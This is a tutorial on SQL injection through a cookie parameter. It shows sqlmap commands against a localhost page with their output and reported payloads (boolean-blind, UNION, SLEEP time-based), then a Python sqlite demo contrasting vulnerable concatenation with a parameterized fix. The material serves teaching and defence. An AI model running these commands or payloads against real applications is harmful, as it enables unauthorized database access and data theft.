MySQL Injection through Cookies

This has been out there for a while now, but I still thought I'd write a simple tutorial on SQL injection through cookies.

What are Cookies?

A cookie is a small piece of data that a web server hands to the browser in a Set-Cookie response header. The browser stores it and sends it back, unchanged, in the Cookie request header on every later request to that server. A common use is keeping a user logged in so they don't have to authenticate again every time they load a page. The point that matters for this tutorial: the browser sends back whatever is stored, so a cookie is client-controlled input exactly like a GET or POST parameter and an attacker can set it to anything they like. Developers who carefully validate form fields often forget to do the same for cookies.

The target's current cookie value is the following:

PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1

SQL Injection With sqlmap

For this example I've used sqlmap, an automatic SQL injection and database takeover tool. The vulnerable cookie parameter is "user_id". A few things to note about the command below: --cookie passes the whole cookie string (the PHPSESSID must stay valid or the application will just bounce us to the login page), -p restricts testing to the user_id parameter, and sqlmap only tests Cookie header values at --level 2 or higher, so the level flag is not optional here. A default run would walk straight past this parameter.

Identifying the Vulnerability

root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL

    sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---

[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

Current Database

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db

...
current database:    'test'

Table List

./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test'
...
Database: test
[1 table]
+------+
| test |
+------+

From here on it works exactly like a normal SQL injection: list the columns with --columns, pull the data with --dump, and so on.
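To see why the three payload shapes sqlmap reported (boolean-based, UNION, time-based) work, and what the fix looks like, here is an added example that is not code from the original post or from the target application. It assumes the server side looked roughly like a PHP page concatenating $_COOKIE['user_id'] into an unquoted numeric WHERE clause that selects three columns (inferred from the payloads above, which carry no quote and three NULLs). sqlite3 stands in for the target's MySQL 'test' database so it runs offline; the table names, rows, and the secrets table are constructed for the example. Two payloads are adapted for the stand-in: MySQL's '#' comment becomes '--', and the MySQL-only 'LIMIT 1,1' trick that blanks out the real row becomes 'AND 1=0'. SLEEP() is registered as a user function so the time-based payload behaves as it does on MySQL.

```python
import sqlite3
import time
from urllib.parse import unquote

# Everything below is constructed for this example. sqlite3 stands in for the
# target's MySQL 'test' database so it runs offline; the users table has three
# columns because sqlmap found "3 columns in query" on the real target.
SESSION = "PHPSESSID=b53vsia3006i1oe0ucmp8t2j20"
QUERY = "SELECT id, name, email FROM users WHERE id = "   # assumed query shape


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com")])
    db.execute("CREATE TABLE secrets (id INTEGER, flag TEXT)")
    db.execute("INSERT INTO secrets VALUES (1, 'flag{cookie-sqli}')")
    # MySQL has SLEEP(); give the stand-in one so the time-based payload works.
    db.create_function("SLEEP", 1, lambda s: time.sleep(float(s)) or 0)
    return db


def parse_cookie_header(header):
    """Fill a dict the way PHP fills $_COOKIE: split on ';', then on the first
    '=', and percent-decode the value. Nothing here validates anything."""
    jar = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            jar[key] = unquote(value)
    return jar


def lookup_vulnerable(db, cookie_header):
    """The bug: the cookie value is glued straight onto the SQL string."""
    user_id = parse_cookie_header(cookie_header).get("user_id", "")
    return db.execute(QUERY + user_id).fetchone()


def lookup_fixed(db, cookie_header):
    """Hardened: reject anything that is not an integer, then bind it as a
    parameter so the value can never change the shape of the query."""
    try:
        user_id = int(parse_cookie_header(cookie_header).get("user_id", ""))
    except ValueError:
        return None
    return db.execute("SELECT id, name, email FROM users WHERE id = ?",
                      (user_id,)).fetchone()


def timed(lookup, db, cookie_header):
    """Run one request and return (row, seconds) so time-based blind shows up."""
    start = time.perf_counter()
    row = lookup(db, cookie_header)
    return row, time.perf_counter() - start


# The three payload shapes sqlmap reported, adapted to the stand-in: MySQL's
# '#' comment becomes '--', and 'LIMIT 1,1' (MySQL-only placement, used to
# blank out the real row) becomes 'AND 1=0'. SLEEP is shortened to 0.2 s.
PAYLOADS = {
    "baseline": "1",
    "boolean-true": "1 AND 8697=8697",
    "boolean-false": "1 AND 8697=8698",
    "union": "1 AND 1=0 UNION ALL SELECT NULL, (SELECT flag FROM secrets), NULL--",
    "time": "1 AND SLEEP(0.2)",
}


def run_all(lookup):
    """Send each payload as the user_id cookie and collect (row, seconds)."""
    db = make_db()
    return {name: timed(lookup, db, f"{SESSION}; user_id={payload}")
            for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    for label, lookup in (("vulnerable", lookup_vulnerable), ("fixed", lookup_fixed)):
        print(f"== {label} ==")
        for name, (row, secs) in run_all(lookup).items():
            print(f"{name:14} {secs:5.2f}s  {row}")
```

Against lookup_vulnerable the true and false boolean payloads return different rows (that is the blind oracle), the UNION payload returns the secrets row in place of the user, and the SLEEP payload returns nothing but takes visibly longer; against lookup_fixed only the plain "1" returns a row and every payload is rejected before it reaches the database. The parameter binding is the real fix; the integer cast is belt-and-braces. A better design would not trust a user_id cookie at all and would take the user from the server-side session instead.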

Cya ..